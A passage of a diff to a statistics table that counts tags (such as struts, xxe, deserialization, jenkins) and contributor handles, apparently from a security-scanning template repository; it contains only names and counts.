| | | | | | | -| amazon | 4 | swissky | 2 | | | | | | | -| thinkcmf | 4 | moritz nentwig | 2 | | | | | | | -| firebase | 4 | cocxanh | 2 | | | | | | | -| vpn | 4 | bing0o | 2 | | | | | | | -| resin | 4 | gal nagli | 2 | | | | | | | -| glpi | 4 | gevakun | 2 | | | | | | | -| slack | 4 | davidmckennirey | 2 | | | | | | | -| strapi | 4 | randomrobbie | 2 | | | | | | | -| git | 4 | socketz | 2 | | | | | | | -| asp | 4 | r3naissance | 2 | | | | | | | -| traversal | 4 | x1m_martijn | 2 | | | | | | | -| wcs | 4 | bp0lr | 2 | | | | | | | -| samsung | 4 | random-robbie | 2 | | | | | | | -| microstrategy | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| elastic | 4 | exploitation | 1 | | | | | | | -| bigip | 4 | elouhi | 1 | | | | | | | +| adobe | 14 | tess | 4 | | | | | | | +| struts | 14 | nodauf | 4 | | | | | | | +| deserialization | 14 | _0xf4n9x_ | 4 | | | | | | | +| intrusive | 13 | leovalcante | 4 | | | | | | | +| dlink | 13 | wisnupramoedya | 4 | | | | | | | +| android | 13 | incogbyte | 4 | | | | | | | +| dns | 13 | idealphase | 3 | | | | | | | +| jenkins | 12 | emenalf | 3 | | | | | | | +| zoho | 12 | dudez | 3 | | | | | | | +| manageengine | 12 | forgedhallpass | 3 | | | | | | | +| magento | 11 | mavericknerd | 3 | | | | | | | +| cve2013 | 11 | shifacyclewala | 3 | | | | | | | +| xxe | 11 | fyoorer | 3 | | | | | | | +| hp | 11 | z3bd | 3 | | | | | | | +| microsoft | 10 | 0w4ys | 3 | | | | | | | +| dell | 10 | sushantkamble | 3 | | | | | | | +| ibm | 9 | andydoering | 3 | | | | | | | +| ftp | 9 | _generic_human_ | 3 | | | | | | | +| kubernetes | 9 | f1tz | 3 | | | | | | | +| fastjson | 9 | impramodsargar | 3 | | | | | | | +| gitlab | 9 | yash anand @yashanand155 | 3 | | | | | | | +| vmware | 9 | alifathi-h1 | 3 | | | | | | | +| rails | 9 | jarijaas | 3 | | | | | | | +| fileupload | 9 | github.com/its0x08 | 3 | | | | | | | +| scada | 8 | me9187 | 3 | | | | | | | +| backup | 8 | thomas_from_offensity | 3 | | | | | | | +| ruijie | 8 | johnjhacking | 3 | | | | | | | +| coldfusion | 8 | lark-lab | 3 | | | | | | | +| airflow | 8 | binaryfigments | 3 | | | | | | | +| cve2008 | 8 | shine | 3 | | | | | | | +| cnvd | 8 | imnightmaree | 3 | | | | | | | +| nginx | 8 | skeltavik | 3 | | | | | | | +| django | 7 | vsh00t | 3 | | | | | | | +| confluence | 7 | sullo | 3 | | | | | | | +| cms | 7 | unstabl3 | 3 | | | | | | | +| files | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| solr | 7 | fabaff | 2 | | | | | | | +| netgear | 7 | randomrobbie | 2 | | | | | | | +| camera | 7 | joeldeleep | 2 | | | | | | | +| prometheus | 6 | g4l1t0 | 2 | | | | | | | +| laravel | 6 | bp0lr | 2 | | | | | | | +| sitecore | 6 | cocxanh | 2 | | | | | | | +| go | 6 | hahwul | 2 | | | | | | | +| drupal | 6 | huowuzhao | 2 | | | | | | | +| lucee | 6 | davidmckennirey | 2 | | | | | | | +| phpmyadmin | 6 | ree4pwn | 2 | | | | | | | +| docker | 6 | swissky | 2 | | | | | | | +| nodejs | 6 | r12w4n | 2 | | | | | | | +| jetty | 6 | parth | 2 | | | | | | | +| citrix | 6 | ehsahil | 2 | | | | | | | +| rconfig | 6 | pxmme1337 | 2 | | | | | | | +| api | 6 | its0x08 | 2 | | | | | | | +| symfony | 5 | amsda | 2 | | | | | | | +| exchange | 5 | bing0o | 2 | | | | | | | +| windows | 5 | bsysop | 2 | | | | | | | +| wso2 | 5 | lotusdll | 2 | | | | | | | +| printer | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| glpi | 5 | 0xprial | 2 | | | | | | | +| thinkphp | 5 | afaq | 2 | | | | | | | +| crlf | 5 | convisoappsec | 2 | | | | | | | +| headless | 5 | alph4byt3 | 2 | | | | | | | +| jolokia | 5 | 0xsapra | 2 | | | | | | | +| gocd | 5 | socketz | 2 | | | | | | | +| java | 5 | gevakun | 2 | | | | | | | +| ssti | 5 | whoever | 2 | | | | | | | +| dedecms | 5 | dahse89 | 2 | | | | | | | +| grafana | 5 | kiblyn11 | 2 | | | | | | | +| circarlife | 5 | mohammedsaneem | 2 | | | | | | | +| iis | 5 | hetroublemakr | 2 | | | | | | | +| tomcat | 5 | koti2 | 2 | | | | | | | +| panos | 4 | 0xsmiley | 2 | | | | | | | +| npm | 4 | w4cky_ | 2 | | | | | | | +| firebase | 4 | bernardofsr | 2 | | | | | | | +| moodle | 4 | r3naissance | 2 | | | | | | | +| elastic | 4 | moritz nentwig | 2 | | | | | | | +| strapi | 4 | nkxxkn | 2 | | | | | | | +| samsung | 4 | 0xelkomy | 2 | | | | | | | +| keycloak | 4 | 0xrudra | 2 | | | | | | | +| microstrategy | 4 | manas_harsh | 2 | | | | | | | +| bigip | 4 | foulenzer | 2 | | | | | | | +| webserver | 4 | dheerajmadhukar | 2 | | | | | | | +| amazon | 4 | gal nagli | 2 | | | | | | | +| thinkcmf | 4 | martincodes-de | 2 | | | | | | | +| solarwinds | 4 | sy3omda | 2 | | | | | | | +| vpn | 4 | udit_thakkur | 2 | | | | | | | +| artifactory | 4 | x1m_martijn | 2 | | | | | | | +| rfi | 4 | vavkamil | 2 | | | | | | | +| asp | 4 | arcc | 2 | | | | | | | +| traversal | 4 | zomsop82 | 2 | | | | | | | +| zimbra | 4 | 0xcrypto | 2 | | | | | | | +| hongdian | 4 | random-robbie | 2 | | | | | | | +| wcs | 4 | pudsec | 1 | | | | | | | +| symantec | 4 | droberson | 1 | | | | | | | +| enum | 4 | 0xh7ml | 1 | | | | | | | +| magmi | 4 | taielab | 1 | | | | | | | +| fatpipe | 4 | luskabol | 1 | | | | | | | +| resin | 4 | jiheon-dev | 1 | | | | | | | +| slack | 4 | bolli95 | 1 | | | | | | | +| firmware | 4 | fq_hsu | 1 | | | | | | | +| buffalo | 4 | brabbit10 | 1 | | | | | | | | maps | 4 | un-fmunozs | 1 | | | | | | | -| rfi | 4 | borna nematzadeh | 1 | | | | | | | -| firmware | 4 | knassar702 | 1 | | | | | | | -| npm | 4 | flag007 | 1 | | | | | | | -| exchange | 4 | cookiehanhoan | 1 | | | | | | | -| webserver | 4 | zandros0 | 1 | | | | | | | -| hongdian | 4 | nvn1729 | 1 | | | | | | | -| magmi | 4 | ldionmarcil | 1 | | | | | | | -| buffalo | 4 | b4uh0lz | 1 | | | | | | | -| symantec | 4 | 0xteles | 1 | | | | | | | -| proxy | 4 | tirtha_mandal | 1 | | | | | | | -| httpd | 3 | nerrorsec | 1 | | | | | | | -| fanruan | 3 | hanlaomo | 1 | | | | | | | -| mongodb | 3 | sec_hawk | 1 | | | | | | | -| cves | 3 | toufik airane | 1 | | | | | | | -| ebs | 3 | fmunozs | 1 | | | | | | | -| nosqli | 3 | aceseven (digisec360) | 1 | | | | | | | -| jeesns | 3 | izn0u | 1 | | | | | | | -| log | 3 | pudsec | 1 | | | | | | | -| cloud | 3 | _harleo | 1 | | | | | | | -| targa | 3 | jiheon-dev | 1 | | | | | | | -| tikiwiki | 3 | kaizensecurity | 1 | | | | | | | -| node | 3 | fq_hsu | 1 | | | | | | | -| jellyfin | 3 | bjhulst | 1 | | | | | | | -| azure | 3 | schniggie | 1 | | | | | | | -| vbulletin | 3 | 0h1in9e | 1 | | | | | | | -| telerik | 3 | rodnt | 1 | | | | | | | -| ssh | 3 | qlkwej | 1 | | | | | | | -| caucho | 3 | deena | 1 | | | | | | | -| terramaster | 3 | willd96 | 1 | | | | | | | -| hoteldruid | 3 | s1r1u5_ | 1 | | | | | | | -| cve2007 | 3 | lark lab | 1 | | | | | | | -| openam | 3 | geraldino2 | 1 | | | | | | | -| sql | 3 | daviey | 1 | | | | | | | -| kafka | 3 | 0xrod | 1 | | | | | | | -| mail | 3 | naglinagli | 1 | | | | | | | -| lfr | 3 | sickwell | 1 | | | | | | | -| itop | 3 | taielab | 1 | | | | | | | -| github | 3 | zhenwarx | 1 | | | | | | | -| ofbiz | 3 | d0rkerdevil | 1 | | | | | | | -| movable | 3 | shreyapohekar | 1 | | | | | | | -| linkerd | 3 | absshax | 1 | | | | | | | -| smtp | 3 | mass0ma | 1 | | | | | | | -| oa | 3 | x6263 | 1 | | | | | | | -| search | 3 | jrolf | 1 | | | | | | | -| bitrix | 3 | tim_koopmans | 1 | | | | | | | -| activemq | 3 | wabafet | 1 | | | | | | | -| r-seenet | 3 | b0yd | 1 | | | | | | | -| nacos | 3 | retr02332 | 1 | | | | | | | -| openssh | 3 | luskabol | 1 | | | | | | | -| exposures | 3 | pratik khalane | 1 | | | | | | | -| injection | 3 | affix | 1 | | | | | | | -| druid | 3 | apt-mirror | 1 | | | | | | | -| kibana | 3 | patralos | 1 | | | | | | | -| opensis | 3 | 0xh7ml | 1 | | | | | | | -| fpd | 3 | udyz | 1 | | | | | | | -| kevinlab | 3 | elmahdi | 1 | | | | | | | -| backdoor | 3 | yashanand155 | 1 | | | | | | | -| zhiyuan | 3 | lethargynavigator | 1 | | | | | | | -| sonicwall | 3 | bolli95 | 1 | | | | | | | -| springcloud | 3 | shelld3v | 1 | | | | | | | -| minio | 3 | alex | 1 | | | | | | | -| lansweeper | 3 | push4d | 1 | | | | | | | -| nexus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| cacti | 3 | notsoevilweasel | 1 | | | | | | | -| xxljob | 2 | manuelbua | 1 | | | | | | | -| lotus | 2 | whynotke | 1 | | | | | | | -| qihang | 2 | streetofhackerr007 | 1 | | | | | | | -| grav | 2 | micha3lb3n | 1 | | | | | | | -| cache | 2 | juicypotato1 | 1 | | | | | | | -| igs | 2 | sshell | 1 | | | | | | | -| rancher | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| jboss | 2 | husain | 1 | | | | | | | -| mailchimp | 2 | smaranchand | 1 | | | | | | | -| hikvision | 2 | ipanda | 1 | | | | | | | -| jsf | 2 | kareemse1im | 1 | | | | | | | -| commax | 2 | iampritam | 1 | | | | | | | -| ecology | 2 | ahmed sherif | 1 | | | | | | | -| harbor | 2 | imnightmaree | 1 | | | | | | | -| trixbox | 2 | blckraven | 1 | | | | | | | -| webcam | 2 | th3.d1p4k | 1 | | | | | | | -| bucket | 2 | pdp | 1 | | | | | | | -| ucmdb | 2 | soyelmago | 1 | | | | | | | -| sharepoint | 2 | ringo | 1 | | | | | | | -| glassfish | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| zabbix | 4 | borna nematzadeh | 1 | | | | | | | +| proxy | 4 | j33n1k4 | 1 | | | | | | | +| git | 4 | manuelbua | 1 | | | | | | | +| openssh | 3 | luqman | 1 | | | | | | | +| openam | 3 | izn0u | 1 | | | | | | | +| telerik | 3 | elmahdi | 1 | | | | | | | +| nosqli | 3 | apt-mirror | 1 | | | | | | | +| fanruan | 3 | d0rkerdevil | 1 | | | | | | | +| minio | 3 | flag007 | 1 | | | | | | | +| itop | 3 | raesene | 1 | | | | | | | +| springcloud | 3 | 0xd0ff9 | 1 | | | | | | | +| fpd | 3 | willd96 | 1 | | | | | | | +| pentaho | 3 | sickwell | 1 | | | | | | | +| sql | 3 | tirtha_mandal | 1 | | | | | | | +| nacos | 3 | schniggie | 1 | | | | | | | +| vbulletin | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| kevinlab | 3 | naglinagli | 1 | | | | | | | +| zhiyuan | 3 | b0rn2r00t | 1 | | | | | | | +| cve2007 | 3 | @github.com/defr0ggy | 1 | | | | | | | +| azure | 3 | mah3sec_ | 1 | | | | | | | +| hoteldruid | 3 | ohlinge | 1 | | | | | | | +| r-seenet | 3 | knassar702 | 1 | | | | | | | +| kibana | 3 | yavolo | 1 | | | | | | | +| db | 3 | oscarintherocks | 1 | | | | | | | +| terramaster | 3 | redteambrasil | 1 | | | | | | | +| smtp | 3 | yuansec | 1 | | | | | | | +| exposures | 3 | exploitation | 1 | | | | | | | +| cves | 3 | push4d | 1 | | | | | | | +| activemq | 3 | rotemreiss | 1 | | | | | | | +| search | 3 | lethargynavigator | 1 | | | | | | | +| injection | 3 | kaizensecurity | 1 | | | | | | | +| lfr | 3 | tim_koopmans | 1 | | | | | | | +| backdoor | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| opensis | 3 | alex | 1 | | | | | | | +| log | 3 | th3.d1p4k | 1 | | | | | | | +| hashicorp | 3 | florianmaak | 1 | | | | | | | +| mongodb | 3 | ipanda | 1 | | | | | | | +| ebs | 3 | sec_hawk | 1 | | | | | | | +| sonicwall | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| axis | 2 | petruknisme | 1 | | | | | | | -| middleware | 2 | kre80r | 1 | | | | | | | -| smb | 2 | alperenkesk | 1 | | | | | | | -| phpcollab | 2 | sbani | 1 | | | | | | | -| openfire | 2 | ooooooo_q | 1 | | | | | | | -| payara | 2 | harshinsecurity | 1 | | | | | | | -| liferay | 2 | igibanez | 1 | | | | | | | -| storage | 2 | berkdusunur | 1 | | | | | | | -| pega | 2 | c3l3si4n | 1 | | | | | | | -| embed | 2 | omarkurt | 1 | | | | | | | -| wordfence | 2 | intx0x80 | 1 | | | | | | | -| rocketchat | 2 | kurohost | 1 | | | | | | | -| jeedom | 2 | akash.c | 1 | | | | | | | -| tidb | 2 | chron0x | 1 | | | | | | | -| couchdb | 2 | clarkvoss | 1 | | | | | | | -| leak | 2 | kba@sogeti_esec | 1 | | | | | | | -| aviatrix | 2 | ajaysenr | 1 | | | | | | | -| heroku | 2 | andysvints | 1 | | | | | | | -| voipmonitor | 2 | makyotox | 1 | | | | | | | -| seeyon | 2 | j33n1k4 | 1 | | | | | | | -| hpe | 2 | hakluke | 1 | | | | | | | -| electron | 2 | thebinitghimire | 1 | | | | | | | -| idrac | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| vrealize | 2 | mubassirpatel | 1 | | | | | | | -| zeroshell | 2 | droberson | 1 | | | | | | | -| bruteforce | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| hjtcloud | 2 | luci | 1 | | | | | | | -| aruba | 2 | brabbit10 | 1 | | | | | | | -| wuzhicms | 2 | sicksec | 1 | | | | | | | -| backups | 2 | ratnadip gajbhiye | 1 | | | | | | | -| cve2005 | 2 | _c0wb0y_ | 1 | | | | | | | -| vcenter | 2 | ahmetpergamum | 1 | | | | | | | -| redis | 2 | @github.com/defr0ggy | 1 | | | | | | | -| hashicorp | 2 | dawid-czarnecki | 1 | | | | | | | -| yapi | 2 | orpheus | 1 | | | | | | | -| nextcloud | 2 | 0xd0ff9 | 1 | | | | | | | -| chiyu | 2 | nytr0gen | 1 | | | | | | | -| prtg | 2 | co0nan | 1 | | | | | | | -| netis | 2 | undefl0w | 1 | | | | | | | -| favicon | 2 | noamrathaus | 1 | | | | | | | -| justwriting | 2 | yavolo | 1 | | | | | | | -| flir | 2 | gboddin | 1 | | | | | | | -| upload | 2 | fopina | 1 | | | | | | | -| db | 2 | 52971 | 1 | | | | | | | -| hostheader-injection | 2 | furkansenan | 1 | | | | | | | -| spark | 2 | xstp | 1 | | | | | | | -| ecoa | 2 | mesaglio | 1 | | | | | | | -| fortios | 2 | yashgoti | 1 | | | | | | | -| myfactory | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| places | 2 | 0ut0fb4nd | 1 | | | | | | | -| phpstorm | 2 | florianmaak | 1 | | | | | | | -| axis2 | 2 | ilovebinbash | 1 | | | | | | | -| aspose | 2 | evolutionsec | 1 | | | | | | | -| paloalto | 2 | jteles | 1 | | | | | | | -| nagios | 2 | majidmc2 | 1 | | | | | | | -| chyrp | 2 | bernardo rodrigues | 1 | | | | | | | +| ofbiz | 3 | sbani | 1 | | | | | | | +| httpd | 3 | pdp | 1 | | | | | | | +| jeesns | 3 | zhenwarx | 1 | | | | | | | +| movable | 3 | ajaysenr | 1 | | | | | | | +| kafka | 3 | patralos | 1 | | | | | | | +| lansweeper | 3 | zandros0 | 1 | | | | | | | +| caucho | 3 | s1r1u5_ | 1 | | | | | | | +| jellyfin | 3 | vzamanillo | 1 | | | | | | | +| oa | 3 | pratik khalane | 1 | | | | | | | +| cacti | 3 | nerrorsec | 1 | | | | | | | +| targa | 3 | thevillagehacker | 1 | | | | | | | +| bitrix | 3 | 0ut0fb4nd | 1 | | | | | | | +| ssh | 3 | micha3lb3n | 1 | | | | | | | +| tikiwiki | 3 | adrianmf | 1 | | | | | | | +| smb | 3 | akash.c | 1 | | | | | | | +| cloud | 3 | nvn1729 | 1 | | | | | | | +| linkerd | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| github | 3 | 0xtavian | 1 | | | | | | | +| mail | 3 | 52971 | 1 | | | | | | | +| nexus | 3 | deena | 1 | | | | | | | +| node | 3 | streetofhackerr007 | 1 | | | | | | | +| druid | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| totemomail | 2 | berkdusunur | 1 | | | | | | | +| xxljob | 2 | ahmed sherif | 1 | | | | | | | +| python | 2 | defr0ggy | 1 | | | | | | | +| odoo | 2 | rodnt | 1 | | | | | | | +| adminer | 2 | blckraven | 1 | | | | | | | +| rancher | 2 | evolutionsec | 1 | | | | | | | +| openfire | 2 | aresx | 1 | | | | | | | +| tidb | 2 | absshax | 1 | | | | | | | +| myfactory | 2 | skylark-lab | 1 | | | | | | | +| icewarp | 2 | shreyapohekar | 1 | | | | | | | +| forcepoint | 2 | revblock | 1 | | | | | | | +| qihang | 2 | philippdelteil | 1 | | | | | | | +| huawei | 2 | notsoevilweasel | 1 | | | | | | | +| bypass | 2 | husain | 1 | | | | | | | +| getsimple | 2 | chron0x | 1 | | | | | | | +| hikvision | 2 | lark lab | 1 | | | | | | | +| sharepoint | 2 | @ofjaaah | 1 | | | | | | | +| maian | 2 | orpheus | 1 | | | | | | | +| netis | 2 | ooooooo_q | 1 | | | | | | | +| splunk | 2 | shelld3v | 1 | | | | | | | +| spring | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| adminer | 2 | akshansh | 1 | | | | | | | -| huawei | 2 | ohlinge | 1 | | | | | | | -| waf | 2 | shifacyclewla | 1 | | | | | | | -| kong | 2 | regala_ | 1 | | | | | | | -| mcafee | 2 | mah3sec_ | 1 | | | | | | | -| akamai | 2 | thevillagehacker | 1 | | | | | | | -| service | 2 | charanrayudu | 1 | | | | | | | -| globalprotect | 2 | retr0 | 1 | | | | | | | -| odoo | 2 | thezakman | 1 | | | | | | | -| openemr | 2 | oscarintherocks | 1 | | | | | | | -| yii | 2 | bad5ect0r | 1 | | | | | | | -| icewarp | 2 | infosecsanyam | 1 | | | | | | | -| geowebserver | 2 | b0rn2r00t | 1 | | | | | | | -| qcubed | 2 | elder tao | 1 | | | | | | | -| text | 2 | yuansec | 1 | | | | | | | -| nextjs | 2 | raesene | 1 | | | | | | | -| prestashop | 2 | jeya seelan | 1 | | | | | | | -| ruby | 2 | andirrahmani1 | 1 | | | | | | | -| ilo | 2 | adrianmf | 1 | | | | | | | -| showdoc | 2 | philippdelteil | 1 | | | | | | | -| oauth | 2 | 0xtavian | 1 | | | | | | | -| emerge | 2 | remonsec | 1 | | | | | | | -| forcepoint | 2 | @dwisiswant0 | 1 | | | | | | | -| plesk | 2 | becivells | 1 | | | | | | | -| totemomail | 2 | rotemreiss | 1 | | | | | | | -| bitly | 2 | _darrenmartyn | 1 | | | | | | | -| bypass | 2 | mhdsamx | 1 | | | | | | | -| openvpn | 2 | revblock | 1 | | | | | | | -| python | 2 | @ofjaaah | 1 | | | | | | | -| linux | 2 | vzamanillo | 1 | | | | | | | -| kentico | 2 | kabirsuda | 1 | | | | | | | -| guacamole | 2 | rojanrijal | 1 | | | | | | | -| netsweeper | 2 | defr0ggy | 1 | | | | | | | -| shellshock | 2 | aresx | 1 | | | | | | | -| spring | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| natshell | 2 | | | | | | | | | -| status | 2 | | | | | | | | | -| sonarqube | 2 | | | | | | | | | -| getsimple | 2 | | | | | | | | | -| dos | 2 | | | | | | | | | -| s3 | 2 | | | | | | | | | -| saltstack | 2 | | | | | | | | | -| chamilo | 2 | | | | | | | | | -| horde | 2 | | | | | | | | | -| linkedin | 2 | | | | | | | | | -| ec2 | 2 | | | | | | | | | -| akkadian | 2 | | | | | | | | | -| splunk | 2 | | | | | | | | | -| frp | 2 | | | | | | | | | +| ecoa | 2 | _c0wb0y_ | 1 | | | | | | | +| prestashop | 2 | affix | 1 | | | | | | | +| bruteforce | 2 | yashanand155 | 1 | | | | | | | +| natshell | 2 | thezakman | 1 | | | | | | | +| redis | 2 | clarkvoss | 1 | | | | | | | +| vcenter | 2 | _darrenmartyn | 1 | | | | | | | +| mida | 2 | sshell | 1 | | | | | | | +| mcafee | 2 | xstp | 1 | | | | | | | +| globalprotect | 2 | co0nan | 1 | | | | | | | +| avantfax | 2 | fopina | 1 | | | | | | | +| justwriting | 2 | wabafet | 1 | | | | | | | +| lotus | 2 | andysvints | 1 | | | | | | | +| nextcloud | 2 | ilovebinbash | 1 | | | | | | | +| graphql | 2 | qlkwej | 1 | | | | | | | +| kong | 2 | rojanrijal | 1 | | | | | | | +| ruby | 2 | ringo | 1 | | | | | | | +| rocketchat | 2 | kurohost | 1 | | | | | | | +| vrealize | 2 | becivells | 1 | | | | | | | +| jeedom | 2 | jeya seelan | 1 | | | | | | | +| jetbrains | 2 | daviey | 1 | | | | | | | +| hostheader-injection | 2 | ldionmarcil | 1 | | | | | | | +| nagios | 2 | soyelmago | 1 | | | | | | | +| akamai | 2 | mubassirpatel | 1 | | | | | | | +| saltstack | 2 | noamrathaus | 1 | | | | | | | +| hasura | 2 | kba@sogeti_esec | 1 | | | | | | | +| middleware | 2 | juicypotato1 | 1 | | | | | | | +| payara | 2 | b0yd | 1 | | | | | | | +| yii | 2 | igibanez | 1 | | | | | | | +| yapi | 2 | x6263 | 1 | | | | | | | +| hpe | 2 | b4uh0lz | 1 | | | | | | | +| emerge | 2 | jteles | 1 | | | | | | | +| frp | 2 | c3l3si4n | 1 | | | | | | | +| storage | 2 | retr02332 | 1 | | | | | | | +| embed | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| axis2 | 2 | luci | 1 | | | | | | | +| shellshock | 2 | shifacyclewla | 1 | | | | | | | +| akkadian | 2 | @dwisiswant0 | 1 | | | | | | | +| chiyu | 2 | udyz | 1 | | | | | | | +| ad | 2 | aceseven (digisec360) | 1 | | | | | | | +| backups | 2 | makyotox | 1 | | | | | | | +| netsweeper | 2 | jrolf | 1 | | | | | | | +| service | 2 | remonsec | 1 | | | | | | | +| grav | 2 | 0h1in9e | 1 | | | | | | | +| ucmdb | 2 | omarkurt | 1 | | | | | | | +| showdoc | 2 | elouhi | 1 | | | | | | | +| jboss | 2 | andirrahmani1 | 1 | | | | | | | +| wordfence | 2 | alperenkesk | 1 | | | | | | | +| guacamole | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| influxdb | 2 | fmunozs | 1 | | | | | | | +| igs | 2 | nytr0gen | 1 | | | | | | | +| cve2005 | 2 | retr0 | 1 | | | | | | | +| fortinet | 2 | furkansenan | 1 | | | | | | | +| idea | 2 | whynotke | 1 | | | | | | | +| wuzhicms | 2 | ahmetpergamum | 1 | | | | | | | +| openemr | 2 | undefl0w | 1 | | | | | | | +| horde | 2 | sicksec | 1 | | | | | | | +| nextjs | 2 | regala_ | 1 | | | | | | | +| couchdb | 2 | iampritam | 1 | | | | | | | +| mailchimp | 2 | hanlaomo | 1 | | | | | | | +| voipmonitor | 2 | charanrayudu | 1 | | | | | | | +| sonarqube | 2 | smaranchand | 1 | | | | | | | +| zeroshell | 2 | cookiehanhoan | 1 | | | | | | | +| flir | 2 | akshansh | 1 | | | | | | | +| waf | 2 | _harleo | 1 | | | | | | | +| upload | 2 | thebinitghimire | 1 | | | | | | | +| chyrp | 2 | kareemse1im | 1 | | | | | | | +| bitly | 2 | mass0ma | 1 | | | | | | | +| glassfish | 2 | ratnadip gajbhiye | 1 | | | | | | | +| prtg | 2 | geraldino2 | 1 | | | | | | | +| text | 2 | elder tao | 1 | | | | | | | +| aruba | 2 | majidmc2 | 1 | | | | | | | +| rstudio | 2 | bad5ect0r | 1 | | | | | | | +| phpstorm | 2 | dawid-czarnecki | 1 | | | | | | | +| aspose | 2 | hakluke | 1 | | | | | | | +| linux | 2 | kabirsuda | 1 | | | | | | | +| linkedin | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| idrac | 2 | bjhulst | 1 | | | | | | | +| pega | 2 | petruknisme | 1 | | | | | | | +| webcam | 2 | yashgoti | 1 | | | | | | | +| openvpn | 2 | gboddin | 1 | | | | | | | +| heroku | 2 | 0xrod | 1 | | | | | | | +| plesk | 2 | mesaglio | 1 | | | | | | | +| ilo | 2 | kre80r | 1 | | | | | | | +| dolibarr | 2 | harshinsecurity | 1 | | | | | | | +| jsf | 2 | 0xteles | 1 | | | | | | | +| kentico | 2 | intx0x80 | 1 | | | | | | | +| spark | 2 | toufik airane | 1 | | | | | | | +| geowebserver | 2 | infosecsanyam | 1 | | | | | | | +| fortios | 2 | mhdsamx | 1 | | | | | | | +| cache | 2 | | | | | | | | | | rockmongo | 2 | | | | | | | | | -| rstudio | 2 | | | | | | | | | -| idea | 2 | | | | | | | | | -| fortinet | 2 | | | | | | | | | -| hasura | 2 | | | | | | | | | -| dolibarr | 2 | | | | | | | | | -| jetbrains | 2 | | | | | | | | | -| maian | 2 | | | | | | | | | -| avantfax | 2 | | | | | | | | | -| mida | 2 | | | | | | | | | -| intercom | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| buildkite | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| dahua | 1 | | | | | | | | | -| postmark | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| binance | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| dreamweaver | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| pagerduty | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| virustotal | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| iconfinder | 1 | | | | | | | | | -| dwsync | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| panasonic | 1 | | | | | | | | | -| iucn | 1 | | | | | | | | | -| youtube | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| billquick | 1 | | | | | | | | | -| okta | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| okiko | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| etherpad | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| package | 1 | | | | | | | | | -| gilacms | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| pmb | 1 | | | | | | | | | -| messaging | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| pendo | 1 | | | | | | | | | -| novnc | 1 | | | | | | | | | -| secmail | 1 | | | | | | | | | -| database | 1 | | | | | | | | | -| webctrl | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| facebook | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| myanimelist | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| strava | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| loganalyzer | 1 | | | | | | | | | -| bingmaps | 1 | | | | | | | | | -| fcm | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | 